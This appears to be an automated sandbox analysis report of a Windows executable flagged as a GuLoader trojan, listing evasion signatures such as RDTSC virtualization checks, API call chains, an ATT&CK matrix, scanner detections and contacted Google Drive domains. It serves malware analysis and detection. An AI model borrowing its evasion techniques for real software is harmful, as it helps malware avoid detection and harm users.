      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI/Special instruction interceptor: Address: 3323683
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI/Special instruction interceptor: Address: 2063683
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeRDTSC instruction interceptor: First address: 32FCD06 second address: 32FCD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F9468FAB746h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeRDTSC instruction interceptor: First address: 203CD06 second address: 203CD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F94692F97E6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe TID: 4152Thread sleep time: -230000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398996934.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI call chain: ExitProcess graph end nodegraph_0-4154
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI call chain: ExitProcess graph end nodegraph_0-3980
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_6FF81A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FF81A98
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Osb7hkGfAb.exe68%VirustotalBrowse
      Osb7hkGfAb.exe75%ReversingLabsWin32.Trojan.GuLoader
      Osb7hkGfAb.exe100%AviraTR/Injector.ofxme

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.google.comll0%Avira URL Cloudsafe
      http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe
      https://www.google.coml0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.184.206
      		truefalse
        		high
        drive.usercontent.google.com
        		216.58.206.33
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comOsb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://www.google.comllOsb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdOsb7hkGfAb.exe, 00000008.00000001.2028190142.00000000005F2000.00000008.00000001.01000000.00000007.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorOsb7hkGfAb.exefalse
                		high
                https://translate.google.com/translate_a/element.jsOsb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E60000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.google.com/Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.google.com/ube.Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/K1IOsb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/ertificatesOsb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2327402583.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.google.com/lK1IOsb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/rOsb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmpfalse
                                		high
                                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdOsb7hkGfAb.exe, 00000008.00000001.2028190142.00000000005F2000.00000008.00000001.01000000.00000007.sdmpfalse
                                  		high
                                  http://www.ftp.ftp://ftp.gopher.Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://drive.usercontent.google.com/Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://apis.google.comOsb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorOsb7hkGfAb.exefalse
